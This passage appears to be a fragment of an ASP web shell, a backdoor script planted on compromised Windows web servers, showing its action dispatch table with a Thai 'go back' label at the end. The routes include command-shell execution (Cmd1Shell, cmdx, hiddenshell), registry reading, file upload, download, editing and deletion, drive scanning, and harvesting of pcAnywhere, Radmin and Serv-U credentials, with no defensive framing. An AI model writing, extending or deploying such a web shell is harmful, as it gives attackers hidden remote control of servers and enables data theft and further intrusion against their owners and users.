  " end select function Gpath() on error resume next err.clear set f=Server.CreateObject("Scripting.FileSystemObject") if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function case"MMD":MMD() case"ReadREG":call ReadREG() case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing case"DownFile":DownFile FName:ShowErr() case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing case"UpFile":UpFile() case"TSearch":TSearch() case"pcanywhere4":pcanywhere4() case"Cmd1Shell":Cmd1Shell() case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL case"Course":Course() case"Alexa":Alexa() case"suftp":suftp() case"upload":upload() case"radmin":radmin() case"pcanywhere4":pcanywhere4() case"goback":goback() Case "ProFile":ProFile() case"php":php() case"downloads":downloads() case"apjdel":apjdel() case"cmdx":cmdx() case"aspx":aspx() case"hiddenshell":hiddenshell() case"ScanDriveForm" : ScanDriveForm case"ScanDrive" : ScanDrive Request("Drive") case"ScFolder" : ScFolder Request("Folder") Case Else MainForm() End Select if Action<>"Servu" then ShowErr() j"" %>
   
  ย้อนกลับ
 •